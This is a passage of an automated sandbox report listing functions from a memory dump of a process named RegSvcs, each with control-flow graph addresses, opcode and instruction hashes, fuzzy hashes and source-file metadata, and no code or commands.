                                                            control_flow_graph 1040 5ddcff8-5ddd013 1041 5ddd015-5ddd018 1040->1041 1042 5ddd01a-5ddd05c 1041->1042 1043 5ddd061-5ddd064 1041->1043 1042->1043 1044 5ddd0ad-5ddd0b0 1043->1044 1045 5ddd066-5ddd0a8 1043->1045 1046 5ddd0f9-5ddd0fc 1044->1046 1047 5ddd0b2-5ddd0f4 1044->1047 1045->1044 1050 5ddd0fe-5ddd140 1046->1050 1051 5ddd145-5ddd148 1046->1051 1047->1046 1050->1051 1053 5ddd14a-5ddd14c 1051->1053 1054 5ddd157-5ddd15a 1051->1054 1057 5ddd39f-5ddd3a8 1053->1057 1058 5ddd152 1053->1058 1059 5ddd15c-5ddd15e 1054->1059 1060 5ddd169-5ddd16c 1054->1060 1062 5ddd3aa-5ddd3af 1057->1062 1063 5ddd3b7-5ddd3c3 1057->1063 1058->1054 1065 5ddd164 1059->1065 1066 5ddd4e1 1059->1066 1067 5ddd18f-5ddd192 1060->1067 1068 5ddd16e-5ddd18a 1060->1068 1062->1063 1071 5ddd3c9-5ddd3dd 1063->1071 1072 5ddd4d4-5ddd4d9 1063->1072 1065->1060 1073 5ddd4e4-5ddd4f0 1066->1073 1067->1073 1074 5ddd198-5ddd19b 1067->1074 1068->1067 1071->1066 1096 5ddd3e3-5ddd3f5 1071->1096 1072->1066 1078 5ddd2fa-5ddd309 1073->1078 1079 5ddd4f6-5ddd7e3 1073->1079 1080 5ddd19d-5ddd1df 1074->1080 1081 5ddd1e4-5ddd1e7 1074->1081 1088 5ddd318-5ddd324 1078->1088 1089 5ddd30b-5ddd310 1078->1089 1253 5ddd7e9-5ddd7ef 1079->1253 1254 5ddda0a-5ddda14 1079->1254 1080->1081 1084 5ddd1e9-5ddd1ff 1081->1084 1085 5ddd204-5ddd207 1081->1085 1084->1085 1097 5ddd209-5ddd24b 1085->1097 1098 5ddd250-5ddd253 1085->1098 1099 5ddd32a-5ddd33c 1088->1099 1100 5ddda15-5ddda4e 1088->1100 1089->1088 1121 5ddd419-5ddd41b 1096->1121 1122 5ddd3f7-5ddd3fd 1096->1122 1097->1098 1101 5ddd25d-5ddd260 1098->1101 1102 5ddd255-5ddd25a 1098->1102 1115 5ddd341-5ddd344 1099->1115 1116 5ddda50-5ddda53 1100->1116 1107 5ddd2a9-5ddd2ac 1101->1107 1108 5ddd262-5ddd2a4 1101->1108 1102->1101 1117 5ddd2ae-5ddd2bd 1107->1117 1118 5ddd2f5-5ddd2f8 1107->1118 1108->1107 1123 5ddd38d-5ddd38f 1115->1123 1124 5ddd346-5ddd388 1115->1124 1125 5ddda55-5ddda81 1116->1125 1126 5ddda86-5ddda89 1116->1126 1130 5ddd2cc-5ddd2d8 1117->1130 1131 5ddd2bf-5ddd2c4 1117->1131 1118->1078 1118->1115 1135 5ddd425-5ddd431 1121->1135 1132 5ddd3ff 1122->1132 1133 5ddd401-5ddd40d 1122->1133 1138 5ddd396-5ddd399 1123->1138 1139 5ddd391 1123->1139 1124->1123 1125->1126 1136 5ddda98-5ddda9b 1126->1136 1137 5ddda8b call 5dddb6d 1126->1137 1130->1100 1140 5ddd2de-5ddd2f0 1130->1140 1131->1130 1141 5ddd40f-5ddd417 1132->1141 1133->1141 1157 5ddd43f 1135->1157 1158 5ddd433-5ddd43d 1135->1158 1144 5ddda9d-5dddab9 1136->1144 1145 5dddabe-5dddac0 1136->1145 1152 5ddda91-5ddda93 1137->1152 1138->1041 1138->1057 1139->1138 1140->1118 1141->1135 1144->1145 1153 5dddac7-5dddaca 1145->1153 1154 5dddac2 1145->1154 1152->1136 1153->1116 1163 5dddacc-5dddadb 1153->1163 1154->1153 1165 5ddd444-5ddd446 1157->1165 1158->1165 1173 5dddadd-5dddb40 call 5dd6660 1163->1173 1174 5dddb42-5dddb57 1163->1174 1165->1066 1168 5ddd44c-5ddd468 call 5dd6660 1165->1168 1187 5ddd46a-5ddd46f 1168->1187 1188 5ddd477-5ddd483 1168->1188 1173->1174 1182 5dddb58 1174->1182 1182->1182 1187->1188 1188->1072 1190 5ddd485-5ddd4d2 1188->1190 1190->1066 1255 5ddd7fe-5ddd807 1253->1255 1256 5ddd7f1-5ddd7f6 1253->1256 1255->1100 1257 5ddd80d-5ddd820 1255->1257 1256->1255 1259 5ddd9fa-5ddda04 1257->1259 1260 5ddd826-5ddd82c 1257->1260 1259->1253 1259->1254 1261 5ddd82e-5ddd833 1260->1261 1262 5ddd83b-5ddd844 1260->1262 1261->1262 1262->1100 1263 5ddd84a-5ddd86b 1262->1263 1266 5ddd86d-5ddd872 1263->1266 1267 5ddd87a-5ddd883 1263->1267 1266->1267 1267->1100 1268 5ddd889-5ddd8a6 1267->1268 1268->1259 1271 5ddd8ac-5ddd8b2 1268->1271 1271->1100 1272 5ddd8b8-5ddd8d1 1271->1272 1274 5ddd9ed-5ddd9f4 1272->1274 1275 5ddd8d7-5ddd8fe 1272->1275 1274->1259 1274->1271 1275->1100 1278 5ddd904-5ddd90e 1275->1278 1278->1100 1279 5ddd914-5ddd92b 1278->1279 1281 5ddd92d-5ddd938 1279->1281 1282 5ddd93a-5ddd955 1279->1282 1281->1282 1282->1274 1287 5ddd95b-5ddd974 call 5dd6660 1282->1287 1291 5ddd976-5ddd97b 1287->1291 1292 5ddd983-5ddd98c 1287->1292 1291->1292 1292->1100 1293 5ddd992-5ddd9e6 1292->1293 1293->1274
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b987b412cccbf9cf8f6108b91b6b3a120b4f56ea2c90229d75800a5344fef5bc
                                                            • Instruction ID: 3e4614c309b37cc5d3611854cb79ccb29c11e26333136e54fee6eedc63bda1fd
                                                            • Opcode Fuzzy Hash: b987b412cccbf9cf8f6108b91b6b3a120b4f56ea2c90229d75800a5344fef5bc
                                                            • Instruction Fuzzy Hash: A8621C307012068FDB25EB68E590A9DB7B3FF85304F248A69D0059F369EB75ED46CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDB708 Relevance: .5, Instructions: 469COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2384 5ddb708-5ddb72a 2385 5ddb72c-5ddb72f 2384->2385 2386 5ddb731-5ddb74d 2385->2386 2387 5ddb752-5ddb755 2385->2387 2386->2387 2388 5ddb96b-5ddb96e 2387->2388 2389 5ddb75b-5ddb75e 2387->2389 2392 5ddb82c-5ddb82f 2388->2392 2393 5ddb974 2388->2393 2390 5ddb77b-5ddb77e 2389->2390 2391 5ddb760-5ddb769 2389->2391 2397 5ddb790-5ddb793 2390->2397 2398 5ddb780-5ddb789 2390->2398 2395 5ddba9f-5ddbad6 2391->2395 2396 5ddb76f-5ddb776 2391->2396 2392->2395 2400 5ddb835-5ddb83c 2392->2400 2399 5ddb979-5ddb97c 2393->2399 2424 5ddbad8-5ddbadb 2395->2424 2396->2390 2402 5ddb79d-5ddb7a0 2397->2402 2403 5ddb795-5ddb798 2397->2403 2398->2391 2401 5ddb78b 2398->2401 2404 5ddb98c-5ddb98f 2399->2404 2405 5ddb97e-5ddb985 2399->2405 2406 5ddb841-5ddb844 2400->2406 2401->2397 2409 5ddb7de-5ddb7e1 2402->2409 2410 5ddb7a2-5ddb7b7 2402->2410 2403->2402 2413 5ddba1f-5ddba20 2404->2413 2414 5ddb995-5ddb998 2404->2414 2411 5ddb93e-5ddb947 2405->2411 2412 5ddb987 2405->2412 2415 5ddb856-5ddb859 2406->2415 2416 5ddb846 2406->2416 2419 5ddb7e8-5ddb7eb 2409->2419 2420 5ddb7e3-5ddb7e5 2409->2420 2410->2395 2451 5ddb7bd-5ddb7d9 2410->2451 2423 5ddb94c-5ddb94f 2411->2423 2412->2404 2417 5ddba25-5ddba28 2413->2417 2414->2398 2418 5ddb99e-5ddb9a1 2414->2418 2421 5ddb8bd-5ddb8c0 2415->2421 2422 5ddb85b-5ddb8b8 call 5dd6660 2415->2422 2429 5ddb84e-5ddb851 2416->2429 2425 5ddba2a-5ddba2e 2417->2425 2426 5ddba47-5ddba4a 2417->2426 2427 5ddb9b1-5ddb9b4 2418->2427 2428 5ddb9a3-5ddb9ac 2418->2428 2419->2413 2430 5ddb7f1-5ddb7f4 2419->2430 2420->2419 2431 5ddb8d0-5ddb8d3 2421->2431 2432 5ddb8c2-5ddb8cb 2421->2432 2422->2421 2433 5ddb966-5ddb969 2423->2433 2434 5ddb951-5ddb955 2423->2434 2435 5ddbadd-5ddbaf9 2424->2435 2436 5ddbafe-5ddbb01 2424->2436 2425->2395 2446 5ddba30-5ddba40 2425->2446 2448 5ddba6d-5ddba70 2426->2448 2449 5ddba4c-5ddba50 2426->2449 2438 5ddb9be-5ddb9c1 2427->2438 2439 5ddb9b6-5ddb9bb 2427->2439 2428->2427 2429->2415 2440 5ddb7fe-5ddb801 2430->2440 2441 5ddb7f6-5ddb7f9 2430->2441 2442 5ddb8fa-5ddb8fd 2431->2442 2443 5ddb8d5-5ddb8d9 2431->2443 2432->2431 2433->2388 2433->2399 2434->2395 2450 5ddb95b-5ddb961 2434->2450 2435->2436 2444 5ddbd6d-5ddbd6f 2436->2444 2445 5ddbb07-5ddbb2f 2436->2445 2452 5ddb9d8-5ddb9db 2438->2452 2453 5ddb9c3-5ddb9c7 2438->2453 2439->2438 2454 5ddb811-5ddb814 2440->2454 2455 5ddb803-5ddb80c 2440->2455 2441->2440 2458 5ddb8ff-5ddb903 2442->2458 2459 5ddb914-5ddb917 2442->2459 2443->2395 2456 5ddb8df-5ddb8ef 2443->2456 2462 5ddbd76-5ddbd79 2444->2462 2463 5ddbd71 2444->2463 2499 5ddbb39-5ddbb7d 2445->2499 2500 5ddbb31-5ddbb34 2445->2500 2446->2449 2484 5ddba42 2446->2484 2464 5ddba7d-5ddba80 2448->2464 2465 5ddba72-5ddba78 2448->2465 2449->2395 2461 5ddba52-5ddba62 2449->2461 2450->2433 2451->2409 2467 5ddb9dd-5ddb9f2 2452->2467 2468 5ddba1a-5ddba1d 2452->2468 2453->2395 2466 5ddb9cd-5ddb9d3 2453->2466 2469 5ddb827-5ddb82a 2454->2469 2470 5ddb816-5ddb822 2454->2470 2455->2454 2456->2413 2487 5ddb8f5 2456->2487 2458->2395 2471 5ddb909-5ddb90f 2458->2471 2472 5ddb939-5ddb93c 2459->2472 2473 5ddb919-5ddb934 2459->2473 2461->2443 2493 5ddba68 2461->2493 2462->2424 2477 5ddbd7f-5ddbd88 2462->2477 2463->2462 2464->2413 2478 5ddba82-5ddba84 2464->2478 2465->2464 2466->2452 2467->2395 2494 5ddb9f8-5ddba15 2467->2494 2468->2413 2468->2417 2469->2392 2469->2406 2470->2469 2471->2459 2472->2411 2472->2423 2473->2472 2480 5ddba8b-5ddba8e 2478->2480 2481 5ddba86 2478->2481 2480->2385 2486 5ddba94-5ddba9e 2480->2486 2481->2480 2484->2426 2487->2442 2493->2448 2494->2468 2507 5ddbb83-5ddbb8c 2499->2507 2508 5ddbd62-5ddbd6c 2499->2508 2500->2477 2509 5ddbd58-5ddbd5d 2507->2509 2510 5ddbb92-5ddbbfe call 5dd6660 2507->2510 2509->2508 2518 5ddbcf8-5ddbd0d 2510->2518 2519 5ddbc04-5ddbc09 2510->2519 2518->2509 2520 5ddbc0b-5ddbc11 2519->2520 2521 5ddbc25 2519->2521 2523 5ddbc17-5ddbc19 2520->2523 2524 5ddbc13-5ddbc15 2520->2524 2525 5ddbc27-5ddbc2d 2521->2525 2526 5ddbc23 2523->2526 2524->2526 2527 5ddbc2f-5ddbc35 2525->2527 2528 5ddbc42-5ddbc4f 2525->2528 2526->2525 2529 5ddbc3b 2527->2529 2530 5ddbce3-5ddbcf2 2527->2530 2535 5ddbc67-5ddbc74 2528->2535 2536 5ddbc51-5ddbc57 2528->2536 2529->2528 2531 5ddbcaa-5ddbcb7 2529->2531 2532 5ddbc76-5ddbc83 2529->2532 2530->2518 2530->2519 2541 5ddbccf-5ddbcdc 2531->2541 2542 5ddbcb9-5ddbcbf 2531->2542 2544 5ddbc9b-5ddbca8 2532->2544 2545 5ddbc85-5ddbc8b 2532->2545 2535->2530 2538 5ddbc59 2536->2538 2539 5ddbc5b-5ddbc5d 2536->2539 2538->2535 2539->2535 2541->2530 2548 5ddbcc1 2542->2548 2549 5ddbcc3-5ddbcc5 2542->2549 2544->2530 2546 5ddbc8d 2545->2546 2547 5ddbc8f-5ddbc91 2545->2547 2546->2544 2547->2544 2548->2541 2549->2541
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2073574641decfd9b0ca881a00637952ff1531f3d8685454d1e3c00318369b37
                                                            • Instruction ID: d18800bd5ed80384e1e7e8fd3a1442f00263de7c140d4420e1670ae61ba7cafb
                                                            • Opcode Fuzzy Hash: 2073574641decfd9b0ca881a00637952ff1531f3d8685454d1e3c00318369b37
                                                            • Instruction Fuzzy Hash: C2024930A002098BEB24DF68D484AADF7B2FB45318F25852BE406EB355DB75ED458FA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDAD88 Relevance: .4, Instructions: 391COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29595e1a05b93351802bd7e27165504182179c4d07ab916dad74c391767e9278
                                                            • Instruction ID: 293a684216df0dcc821afaf63c4ea88dd368c188a6f336c9fc86d8cd1e0d5165
                                                            • Opcode Fuzzy Hash: 29595e1a05b93351802bd7e27165504182179c4d07ab916dad74c391767e9278
                                                            • Instruction Fuzzy Hash: A1E15F31B012098BDB24DB68D494AAEF7B3FF89304F21852BE405EB355EB359C46CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD9210 Relevance: .2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5dc177a28bdc154c334bf0072ff2e55b61d29991c66f4153bf0ad7cc223aa56d
                                                            • Instruction ID: c75cd360d6814acfed50d4081886e20c296a1f65984829e8bee203a39a7b6591
                                                            • Opcode Fuzzy Hash: 5dc177a28bdc154c334bf0072ff2e55b61d29991c66f4153bf0ad7cc223aa56d
                                                            • Instruction Fuzzy Hash: 7D915630B0015A8BDB55DB69D8A0BAEB7F6BF85300F108569C409EB348EF71DD469B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD62B0 Relevance: .2, Instructions: 229COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9f93870cf5761fdb0b350fb1640faf55884d5ed198a45115ca0181c9ce4b869
                                                            • Instruction ID: 8708108d86b7fe77e9773b91ffd98da76b55877649dc262240a5c0e2909a988d
                                                            • Opcode Fuzzy Hash: c9f93870cf5761fdb0b350fb1640faf55884d5ed198a45115ca0181c9ce4b869
                                                            • Instruction Fuzzy Hash: CD61D172F001214BDF109A7DD880A6FFAD7AFD5220B25443AE90ADB364DE65EC0287D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD4359 Relevance: .2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a0403590728c0ed289dce781b1fe7c158f08db26ad3f8286e0025a8e0a1148a
                                                            • Instruction ID: 3f6279642bb8a0182a54407b1849e92890e4c9138193cb43f735bdce389863a4
                                                            • Opcode Fuzzy Hash: 7a0403590728c0ed289dce781b1fe7c158f08db26ad3f8286e0025a8e0a1148a
                                                            • Instruction Fuzzy Hash: 6D813F34B012468BDF54DBA9D494BAEB7B3BF85300F108929D40AEB354EB71DC868B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD4674 Relevance: .2, Instructions: 214COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ee6e6d96ce65e86d2e6d63c34fccfe7f3575aefda64ec827f1bb3eb8655c24ed
                                                            • Instruction ID: 87a3221dc843ec21c70482b5bcc1d30bc3077f91ea9c6e72995afad32e0e06c5
                                                            • Opcode Fuzzy Hash: ee6e6d96ce65e86d2e6d63c34fccfe7f3575aefda64ec827f1bb3eb8655c24ed
                                                            • Instruction Fuzzy Hash: 4A913D34E006198BDF60DF68C890B9DF7B2FF89310F20859AD549AB355DB70AA85CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD4688 Relevance: .2, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4edb0b0016a12a5411d6303f46ac71b565986bb7c461e5c16308f4386960b628
                                                            • Instruction ID: e7eb5418a72893ba64f59dd64e72784bfb269776d4a58d22c3686946b6f5ad03
                                                            • Opcode Fuzzy Hash: 4edb0b0016a12a5411d6303f46ac71b565986bb7c461e5c16308f4386960b628
                                                            • Instruction Fuzzy Hash: 38913C30E006198BDF60DF68C890B9DF7B2FF89310F20859AD549AB345DB71AA85CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDEFC8 Relevance: .2, Instructions: 204COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ecc246d3e8d1b7d78485790c46f3221be60baa0c6d84fe537674864f4396cff
                                                            • Instruction ID: 57fa131a5ba28e1acfa9563d531061f9beccfdc7b0de836595d7458dfdaa6a68
                                                            • Opcode Fuzzy Hash: 3ecc246d3e8d1b7d78485790c46f3221be60baa0c6d84fe537674864f4396cff
                                                            • Instruction Fuzzy Hash: 9E712E70A012099FDB14DBA9D990AAEFBF6FF84304F14852AD406EB355DB30ED46CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDEFD8 Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fe3a927103fd15de642eaae9a87e65a971040ec0f31cd20c1166bbf35b00f6a
                                                            • Instruction ID: 8a9ffcfe4ff8b118b4051b89e81860571ef775a9d749b4025ec849a6f080a8fd
                                                            • Opcode Fuzzy Hash: 3fe3a927103fd15de642eaae9a87e65a971040ec0f31cd20c1166bbf35b00f6a
                                                            • Instruction Fuzzy Hash: 8A711D74A012099FDB14DBA9D990AAEFBF6FF88304F14852AD406DB355DB30E946CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD4C20 Relevance: .2, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 20e7d3aca9ad1ffd2d292c9d4bfc147ec85fb115b778685592c14aa6bf74ab4d
                                                            • Instruction ID: f86b5734494177ecfe587297aa88b5a3c654b4981a7ef58fa26154740d6b0484
                                                            • Opcode Fuzzy Hash: 20e7d3aca9ad1ffd2d292c9d4bfc147ec85fb115b778685592c14aa6bf74ab4d
                                                            • Instruction Fuzzy Hash: A6615130A002189FDF149BA8D854BAEBBB6FF88300F20852AE506EB395DF755D458F91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDFD29 Relevance: .2, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea883277dcc0fcfdbb6c7f28a64fe22cd5cd5892ce91ee7bd0278833ab4e0a12
                                                            • Instruction ID: d6795659d8f3c591df9414587c07e78de7bab5bfbe3ead09f0830d8beba4a331
                                                            • Opcode Fuzzy Hash: ea883277dcc0fcfdbb6c7f28a64fe22cd5cd5892ce91ee7bd0278833ab4e0a12
                                                            • Instruction Fuzzy Hash: 5151C331A01106DFDB24AB78E494AADF7B2FB85315F10886AE10BDB351DB359845CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD91FF Relevance: .2, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb28cad55721436149179fd85b09d2dcf628605a7df712a4e2640cfd3ce3f84e
                                                            • Instruction ID: d216f1126bbe4258a3728f8804c057773e4183241824d1ccc23fc9a4a13ca2e9
                                                            • Opcode Fuzzy Hash: eb28cad55721436149179fd85b09d2dcf628605a7df712a4e2640cfd3ce3f84e
                                                            • Instruction Fuzzy Hash: 27512430B011468BDB55DB78D8A0F6EB7F6FB89300F148969C406EB359EE31DC0A9B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDFAD7 Relevance: .2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c407ebcb7346ea2956753d23b37760db93258413d4f13fb37deabec55245b0e
                                                            • Instruction ID: 5165597c078d5cf917c42a765bc165555d15fed6e4899d05394c9e451a01300a
                                                            • Opcode Fuzzy Hash: 1c407ebcb7346ea2956753d23b37760db93258413d4f13fb37deabec55245b0e
                                                            • Instruction Fuzzy Hash: BD51B3347101059BEF20576CD8A4F7F7AABF79A310F20442BE50BC3395CA28DC965BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDFAE8 Relevance: .2, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 402019cfc70cb878dead947dd2790159b2d2860f63d17a6aaa0d9322a34fe19b
                                                            • Instruction ID: 62b1b2d69ef6de7ed7f1dcf5e8ce76fbff49c03468dd3f47a99fea46029232e9
                                                            • Opcode Fuzzy Hash: 402019cfc70cb878dead947dd2790159b2d2860f63d17a6aaa0d9322a34fe19b
                                                            • Instruction Fuzzy Hash: 1A51B4347101059BEF20576CD8A4F7F76ABF79A310F20442BE50BC7395CA28DC965BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD54C8 Relevance: .1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c83d15f8341123f9f7c641baf6c8d8c4cc5d1fe407ca8179434afe62cc2d5165
                                                            • Instruction ID: c7e57387cc17c741e292c929731befa741574b5bd501bb6229d7ba6a241be0f0
                                                            • Opcode Fuzzy Hash: c83d15f8341123f9f7c641baf6c8d8c4cc5d1fe407ca8179434afe62cc2d5165
                                                            • Instruction Fuzzy Hash: 4A415E71A006098FDB21CFA9E880ABFF7B2FB95310F10492BE156D7650D731E9498BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD4C10 Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d02dfe1b7e7d3969bcd94ae806cd7387ac7a27eb6be00bdd83b4fc18e4589a9
                                                            • Instruction ID: 4ad349b4a72770485b508845c81efaffda43e6ba7035af2b78058744d314d1bf
                                                            • Opcode Fuzzy Hash: 7d02dfe1b7e7d3969bcd94ae806cd7387ac7a27eb6be00bdd83b4fc18e4589a9
                                                            • Instruction Fuzzy Hash: EB416D31B002089FDB549FA9C855BAEBBF6FF88300F20852AE505EB395DF759D058B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDDB6D Relevance: .1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 72334b005861b7f8c6db1f46fd4b5e353f7d3b9d2695e2e4b5f14281bbf97e7c
                                                            • Instruction ID: 6b4a1afa7e4993d5dbd2fd0c5863e65db73eb26a4ad70e2bacf027b0db8e5609
                                                            • Opcode Fuzzy Hash: 72334b005861b7f8c6db1f46fd4b5e353f7d3b9d2695e2e4b5f14281bbf97e7c
                                                            • Instruction Fuzzy Hash: 0C414370A006099FDF14EF69C894AAEBBB3FF85344F24452AD405DB340EB749846CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD228D Relevance: .1, Instructions: 111COMMON
                                                            Download Yara Rule
